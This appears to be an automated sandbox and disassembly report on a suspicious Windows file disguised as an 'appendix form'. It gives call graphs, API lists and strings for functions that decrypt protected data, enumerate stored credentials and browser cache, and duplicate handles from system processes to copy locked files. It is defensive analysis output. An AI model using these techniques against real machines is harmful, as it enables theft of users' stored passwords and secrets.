38733 40aebe FindClose 38731->38733 38732 40add4 2 API calls 38732->38734 38735 4453fe 38733->38735 38734->38730 38734->38731 38734->38732 38736 445403 254 API calls 38734->38736 38735->38421 38736->38734 38738 40ae7b FindNextFileW 38737->38738 38739 40ae5c FindFirstFileW 38737->38739 38740 40ae94 38738->38740 38741 40ae8f 38738->38741 38739->38740 38743 40aeb6 38740->38743 38744 409d1f 6 API calls 38740->38744 38742 40aebe FindClose 38741->38742 38742->38740 38743->38421 38744->38743 38745->38306 38746->38285 38747->38381 38748->38362 38749->38362 38750->38395 38752 409c89 38751->38752 38752->38417 38753->38448 38755 413d39 38754->38755 38756 413d2f FreeLibrary 38754->38756 38757 40b633 free 38755->38757 38756->38755 38758 413d42 38757->38758 38759 40b633 free 38758->38759 38760 413d4a 38759->38760 38760->38275 38761->38278 38762->38331 38763->38345 38765 44db70 38764->38765 38766 40b6fc memset 38765->38766 38767 409c70 2 API calls 38766->38767 38768 40b732 wcsrchr 38767->38768 38769 40b743 38768->38769 38770 40b746 memset 38768->38770 38769->38770 38771 40b2cc 27 API calls 38770->38771 38772 40b76f 38771->38772 38773 409d1f 6 API calls 38772->38773 38774 40b783 38773->38774 39822 409b98 GetFileAttributesW 38774->39822 38776 40b792 38777 40b7c2 38776->38777 38778 409c70 2 API calls 38776->38778 39823 40bb98 38777->39823 38780 40b7a5 38778->38780 38782 40b2cc 27 API calls 38780->38782 38786 40b7b2 38782->38786 38783 40b837 CloseHandle 38785 40b83e memset 38783->38785 38784 40b817 38787 409a45 3 API calls 38784->38787 39856 40a6e6 WideCharToMultiByte 38785->39856 38789 409d1f 6 API calls 38786->38789 38790 40b827 CopyFileW 38787->38790 38789->38777 38790->38785 38791 40b866 38792 444432 121 API calls 38791->38792 38794 40b879 38792->38794 38793 40bad5 38796 40baeb 38793->38796 38797 40bade DeleteFileW 38793->38797 38794->38793 38795 40b273 27 API calls 38794->38795 38798 40b89a 38795->38798 38799 40b04b ??3@YAXPAX 38796->38799 38797->38796 38800 438552 134 API calls 
38798->38800 38801 40baf3 38799->38801 38802 40b8a4 38800->38802 38801->38355 38803 40bacd 38802->38803 38805 4251c4 137 API calls 38802->38805 38804 443d90 111 API calls 38803->38804 38804->38793 38828 40b8b8 38805->38828 38806 40bac6 39866 424f26 123 API calls 38806->39866 38807 40b8bd memset 39857 425413 17 API calls 38807->39857 38810 425413 17 API calls 38810->38828 38813 40a71b MultiByteToWideChar 38813->38828 38814 40a734 MultiByteToWideChar 38814->38828 38817 40b9b5 memcmp 38817->38828 38818 4099c6 2 API calls 38818->38828 38819 404423 38 API calls 38819->38828 38822 40bb3e memset memcpy 39867 40a734 MultiByteToWideChar 38822->39867 38823 4251c4 137 API calls 38823->38828 38825 40bb88 LocalFree 38825->38828 38828->38806 38828->38807 38828->38810 38828->38813 38828->38814 38828->38817 38828->38818 38828->38819 38828->38822 38828->38823 38829 40ba5f memcmp 38828->38829 39858 4253ef 16 API calls 38828->39858 39859 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38828->39859 39860 4253af 17 API calls 38828->39860 39861 4253cf 17 API calls 38828->39861 39862 447280 memset 38828->39862 39863 447960 memset memcpy memcpy memcpy 38828->39863 39864 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38828->39864 39865 447920 memcpy memcpy memcpy 38828->39865 38829->38828 38830->38357 38832 40aed1 38831->38832 38833 40aec7 FindClose 38831->38833 38832->38289 38833->38832 38835 4099d7 38834->38835 38836 4099da memcpy 38834->38836 38835->38836 38836->38340 38838 40b2cc 27 API calls 38837->38838 38839 44543f 38838->38839 38840 409d1f 6 API calls 38839->38840 38841 44544f 38840->38841 39951 409b98 GetFileAttributesW 38841->39951 38843 44545e 38844 445476 38843->38844 38845 40b6ef 253 API calls 38843->38845 38846 40b2cc 27 API calls 38844->38846 38845->38844 38847 445482 38846->38847 38848 409d1f 6 API calls 38847->38848 38849 445492 38848->38849 39952 409b98 GetFileAttributesW 38849->39952 38851 4454a1 38852 4454b9 38851->38852 38853 40b6ef 253 API calls 38851->38853 38852->38370 
38853->38852 38854->38369 38855->38386 38856->38392 38857->38429 38858->38406 38859->38456 38860->38456 38861->38437 38862->38467 38863->38469 38864->38471 38866 414c2e 17 API calls 38865->38866 38867 40c2ae 38866->38867 38937 40c1d3 38867->38937 38872 40c3be 38889 40a8ab 38872->38889 38873 40afcf 2 API calls 38874 40c2fd FindFirstUrlCacheEntryW 38873->38874 38875 40c3b6 38874->38875 38876 40c31e wcschr 38874->38876 38877 40b04b ??3@YAXPAX 38875->38877 38878 40c331 38876->38878 38879 40c35e FindNextUrlCacheEntryW 38876->38879 38877->38872 38881 40a8ab 9 API calls 38878->38881 38879->38876 38880 40c373 GetLastError 38879->38880 38882 40c3ad FindCloseUrlCache 38880->38882 38883 40c37e 38880->38883 38884 40c33e wcschr 38881->38884 38882->38875 38885 40afcf 2 API calls 38883->38885 38884->38879 38886 40c34f 38884->38886 38887 40c391 FindNextUrlCacheEntryW 38885->38887 38888 40a8ab 9 API calls 38886->38888 38887->38876 38887->38882 38888->38879 39126 40a97a 38889->39126 38892 40a8cc 38892->38478 38893 40a8d0 7 API calls 38893->38892 39131 40b1ab free free 38894->39131 38896 40c3dd 38897 40b2cc 27 API calls 38896->38897 38898 40c3e7 38897->38898 39132 414592 RegOpenKeyExW 38898->39132 38900 40c3f4 38901 40c50e 38900->38901 38902 40c3ff 38900->38902 38916 405337 38901->38916 38903 40a9ce 4 API calls 38902->38903 38904 40c418 memset 38903->38904 39133 40aa1d 38904->39133 38907 40c471 38909 40c47a _wcsupr 38907->38909 38908 40c505 RegCloseKey 38908->38901 38910 40a8d0 7 API calls 38909->38910 38911 40c498 38910->38911 38912 40a8d0 7 API calls 38911->38912 38913 40c4ac memset 38912->38913 38914 40aa1d 38913->38914 38915 40c4e4 RegEnumValueW 38914->38915 38915->38908 38915->38909 39135 405220 38916->39135 38920 4099c6 2 API calls 38919->38920 38921 40a714 _wcslwr 38920->38921 38922 40c634 38921->38922 39192 405361 38922->39192 38925 40c65c wcslen 39195 4053b6 39 API calls 38925->39195 38926 40c71d wcslen 38926->38487 38928 40c677 38929 40c713 38928->38929 39196 40538b 39 API 
calls 38928->39196 39198 4053df 39 API calls 38929->39198 38932 40c6a5 38932->38929 38933 40c6a9 memset 38932->38933 38934 40c6d3 38933->38934 39197 40c589 44 API calls 38934->39197 38936->38485 38938 40ae18 9 API calls 38937->38938 38944 40c210 38938->38944 38939 40ae51 9 API calls 38939->38944 38940 40c264 38941 40aebe FindClose 38940->38941 38943 40c26f 38941->38943 38942 40add4 2 API calls 38942->38944 38949 40e5ed memset memset 38943->38949 38944->38939 38944->38940 38944->38942 38945 40c231 _wcsicmp 38944->38945 38946 40c1d3 35 API calls 38944->38946 38945->38944 38947 40c248 38945->38947 38946->38944 38962 40c084 22 API calls 38947->38962 38950 414c2e 17 API calls 38949->38950 38951 40e63f 38950->38951 38952 409d1f 6 API calls 38951->38952 38953 40e658 38952->38953 38963 409b98 GetFileAttributesW 38953->38963 38955 40e667 38956 40e680 38955->38956 38957 409d1f 6 API calls 38955->38957 38964 409b98 GetFileAttributesW 38956->38964 38957->38956 38959 40e68f 38960 40c2d8 38959->38960 38965 40e4b2 38959->38965 38960->38872 38960->38873 38962->38944 38963->38955 38964->38959 38986 40e01e 38965->38986 38967 40e593 38968 40e5b0 38967->38968 38969 40e59c DeleteFileW 38967->38969 38970 40b04b ??3@YAXPAX 38968->38970 38969->38968 38972 40e5bb 38970->38972 38971 40e521 38971->38967 39009 40e175 38971->39009 38974 40e5c4 CloseHandle 38972->38974 38975 40e5cc 38972->38975 38974->38975 38977 40b633 free 38975->38977 38976 40e573 38978 40e584 38976->38978 38979 40e57c CloseHandle 38976->38979 38980 40e5db 38977->38980 39052 40b1ab free free 38978->39052 38979->38978 38982 40b633 free 38980->38982 38983 40e5e3 38982->38983 38983->38960 38985 40e540 38985->38976 39029 40e2ab 38985->39029 39053 406214 38986->39053 38989 40e16b 38989->38971 38992 40afcf 2 API calls 38993 40e08d OpenProcess 38992->38993 38994 40e0a4 GetCurrentProcess DuplicateHandle 38993->38994 38998 40e152 38993->38998 38995 40e0d0 GetFileSize 38994->38995 38996 40e14a CloseHandle 38994->38996 39089 409a45 
GetTempPathW 38995->39089 38996->38998 38997 40e160 39001 40b04b ??3@YAXPAX 38997->39001 38998->38997 39000 406214 22 API calls 38998->39000 39000->38997 39001->38989 39002 40e0ea 39092 4096dc CreateFileW 39002->39092 39004 40e0f1 CreateFileMappingW 39005 40e140 CloseHandle CloseHandle 39004->39005 39006 40e10b MapViewOfFile 39004->39006 39005->38996 39007 40e13b CloseHandle 39006->39007 39008 40e11f WriteFile UnmapViewOfFile 39006->39008 39007->39005 39008->39007 39010 40e18c 39009->39010 39093 406b90 39010->39093 39013 40e1a7 memset 39019 40e1e8 39013->39019 39014 40e299 39103 4069a3 39014->39103 39020 40e283 39019->39020 39021 40dd50 _wcsicmp 39019->39021 39027 40e244 _snwprintf 39019->39027 39110 406e8f 13 API calls 39019->39110 39111 40742e 8 API calls 39019->39111 39112 40aae3 wcslen wcslen _memicmp 39019->39112 39113 406b53 SetFilePointerEx ReadFile 39019->39113 39022 40e291 39020->39022 39023 40e288 free 39020->39023 39021->39019 39024 40aa04 free 39022->39024 39023->39022 39024->39014 39028 40a8d0 7 API calls 39027->39028 39028->39019 39030 40e2c2 39029->39030 39031 406b90 11 API calls 39030->39031 39032 40e2d3 39031->39032 39033 40e4a0 39032->39033 39038 40e489 39032->39038 39041 40dd50 _wcsicmp 39032->39041 39047 40e3e0 memcpy 39032->39047 39048 40e3fb memcpy 39032->39048 39049 40e3b3 wcschr 39032->39049 39050 40e416 memcpy 39032->39050 39051 40e431 memcpy 39032->39051 39114 406e8f 13 API calls 39032->39114 39115 40dd50 _wcsicmp 39032->39115 39124 40742e 8 API calls 39032->39124 39125 406b53 SetFilePointerEx ReadFile 39032->39125 39034 4069a3 2 API calls 39033->39034 39036 40e4ab 39034->39036 39036->38985 39039 40aa04 free 39038->39039 39040 40e491 39039->39040 39040->39033 39042 40e497 free 39040->39042 39041->39032 39042->39033 39044 40e376 memset 39116 40aa29 39044->39116 39047->39032 39048->39032 39049->39032 39050->39032 39051->39032 39052->38967 39054 406294 CloseHandle 39053->39054 39055 406224 39054->39055 39056 4096c3 CreateFileW 39055->39056 
39058 40622d 39056->39058 39057 406281 GetLastError 39059 40625a 39057->39059 39058->39057 39060 40a2ef ReadFile 39058->39060 39059->38989 39064 40dd85 memset 39059->39064 39061 406244 39060->39061 39061->39057 39062 40624b 39061->39062 39062->39059 39063 406777 19 API calls 39062->39063 39063->39059 39065 409bca GetModuleFileNameW 39064->39065 39066 40ddbe CreateFileW 39065->39066 39069 40ddf1 39066->39069 39067 40afcf ??2@YAPAXI ??3@YAXPAX 39067->39069 39068 41352f 9 API calls 39068->39069 39069->39067 39069->39068 39070 40de0b NtQuerySystemInformation 39069->39070 39071 40de3b CloseHandle GetCurrentProcessId 39069->39071 39070->39069 39072 40de54 39071->39072 39073 413d4c 46 API calls 39072->39073 39081 40de88 39073->39081 39074 40e00c 39075 413d29 free FreeLibrary 39074->39075 39076 40e014 39075->39076 39076->38989 39076->38992 39077 40dea9 _wcsicmp 39078 40dee7 OpenProcess 39077->39078 39079 40debd _wcsicmp 39077->39079 39078->39081 39079->39078 39080 40ded0 _wcsicmp 39079->39080 39080->39078 39080->39081 39081->39074 39081->39077 39082 40dfef CloseHandle 39081->39082 39083 40df78 39081->39083 39084 40df23 GetCurrentProcess DuplicateHandle 39081->39084 39087 40df8f CloseHandle 39081->39087 39082->39081 39083->39082 39083->39087 39088 40dfae _wcsicmp 39083->39088 39084->39081 39085 40df4c memset 39084->39085 39086 41352f 9 API calls 39085->39086 39086->39081 39087->39083 39088->39081 39088->39083 39090 409a74 GetTempFileNameW 39089->39090 39091 409a66 GetWindowsDirectoryW 39089->39091 39090->39002 39091->39090 39092->39004 39094 406bd5 39093->39094 39095 406bad 39093->39095 39097 4066bf free malloc memcpy free free 39094->39097 39102 406c0f 39094->39102 39095->39094 39096 406bba _wcsicmp 39095->39096 39096->39094 39096->39095 39098 406be5 39097->39098 39099 40afcf ??2@YAPAXI ??3@YAXPAX 39098->39099 39098->39102 39100 406bff 39099->39100 39101 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39100->39101 39101->39102 39102->39013 39102->39014 39104 
4069c4 ??3@YAXPAX 39103->39104 39105 4069af 39104->39105 39106 40b633 free 39105->39106 39107 4069ba 39106->39107 39108 40b04b ??3@YAXPAX 39107->39108 39109 4069c2 39108->39109 39109->38985 39110->39019 39111->39019 39112->39019 39113->39019 39114->39032 39115->39044 39117 40aa33 39116->39117 39118 40aa63 39116->39118 39119 40aa44 39117->39119 39120 40aa38 wcslen 39117->39120 39118->39032 39121 40a9ce malloc memcpy free free 39119->39121 39120->39119 39122 40aa4d 39121->39122 39122->39118 39123 40aa51 memcpy 39122->39123 39123->39118 39124->39032 39125->39032 39130 40a980 39126->39130 39127 40a8bb 39127->38892 39127->38893 39128 40a995 _wcsicmp 39128->39130 39129 40a99c wcscmp 39129->39130 39130->39127 39130->39128 39130->39129 39131->38896 39132->38900 39134 40aa23 RegEnumValueW 39133->39134 39134->38907 39134->38908 39136 405335 39135->39136 39137 40522a 39135->39137 39136->38487 39138 40b2cc 27 API calls 39137->39138 39139 405234 39138->39139 39140 40a804 8 API calls 39139->39140 39141 40523a 39140->39141 39180 40b273 39141->39180 39143 405248 _mbscpy _mbscat GetProcAddress 39144 40b273 27 API calls 39143->39144 39145 405279 39144->39145 39183 405211 GetProcAddress 39145->39183 39147 405282 39148 40b273 27 API calls 39147->39148 39149 40528f 39148->39149 39184 405211 GetProcAddress 39149->39184 39151 405298 39152 40b273 27 API calls 39151->39152 39153 4052a5 39152->39153 39185 405211 GetProcAddress 39153->39185 39155 4052ae 39156 40b273 27 API calls 39155->39156 39157 4052bb 39156->39157 39186 405211 GetProcAddress 39157->39186 39159 4052c4 39160 40b273 27 API calls 39159->39160 39161 4052d1 39160->39161 39187 405211 GetProcAddress 39161->39187 39163 4052da 39164 40b273 27 API calls 39163->39164 39165 4052e7 39164->39165 39188 405211 GetProcAddress 39165->39188 39167 4052f0 39168 40b273 27 API calls 39167->39168 39169 4052fd 39168->39169 39189 405211 GetProcAddress 39169->39189 39171 405306 39172 40b273 27 API calls 39171->39172 39173 405313 39172->39173 39190 

                                                                                                              Control-flow Graph (function 40dd85; graph image not included in this extraction)
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040DDAD
                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                              • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                              • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                              • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                              • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                              • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                              • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                              • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                              • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                              • memset.MSVCRT ref: 0040DF5F
                                                                                                              • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                              • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                              • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                              • String ID: dllhost.exe$p+vw@Fvw@Bvw$taskhost.exe$taskhostex.exe
                                                                                                              • API String ID: 708747863-11196306
                                                                                                              • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                              • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                              • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                              • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                                              Control-flow Graph (function 413d4c; graph image not included in this extraction)
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                              • memset.MSVCRT ref: 00413D7F
                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                              • memset.MSVCRT ref: 00413E07
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                              • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                              • free.MSVCRT ref: 00413EC1
                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                              • API String ID: 1344430650-1740548384
                                                                                                              • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                              • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                              • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                              • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                              Control-flow Graph (function 40b58d; graph image not included in this extraction)
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                              • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                              • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                              • String ID: AE$BIN
                                                                                                              • API String ID: 1668488027-3931574542
                                                                                                              • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                              • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                              • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                              • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                              • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 767404330-0
                                                                                                              • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                              • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                              • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$FirstNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 1690352074-0
                                                                                                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0041898C
                                                                                                              • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InfoSystemmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3558857096-0
                                                                                                              • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                              • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004455C2
                                                                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                                                                              • memset.MSVCRT ref: 0044570D
                                                                                                              • memset.MSVCRT ref: 00445725
                                                                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
